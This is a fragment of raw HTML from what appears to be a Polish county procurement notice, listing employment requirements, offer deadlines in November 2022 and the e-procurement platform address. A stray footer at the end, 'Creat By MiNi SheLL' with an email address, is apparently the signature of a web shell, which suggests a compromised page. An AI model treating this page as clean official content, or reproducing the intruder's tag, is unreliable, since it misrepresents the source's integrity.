class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-23 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma zakupowa https://starostwokolskie.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-23 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com